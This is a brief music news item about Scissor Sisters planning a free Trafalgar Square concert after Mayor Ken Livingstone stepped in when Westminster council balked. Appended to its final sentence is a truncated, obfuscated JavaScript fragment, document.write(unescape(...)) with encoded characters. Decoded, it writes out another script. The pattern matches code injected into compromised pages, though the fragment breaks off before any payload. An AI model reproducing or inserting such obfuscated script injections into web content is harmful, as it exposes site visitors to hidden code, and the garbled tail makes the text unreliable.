The iconic NYC stars are expected to confirm details of a one-off show in Trafalgar Square in London next month, which has been backed by the city's Mayor Ken Livingstone.
According to reports in the UK press this morning, Westminster council initially blocked plans for the Scissor Sisters to play the free concert, before Livingstone stepped in.
"If it wasn't for British fans their career wouldn't have taken off so quickly, so they wanted to give something back," a 'source' told The Sun.
"They made moves to get Trafalgar Square for a big free concert but Westminster Council - who have the final say - weren't too keen.
"Ken intervened because he thought it was a great event and his help appears to be making a difference."
The Scissor Sisters release their new album, "Ta-Dah", on September 18, two days after they're scheduled to play the Trafalgar Square event.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
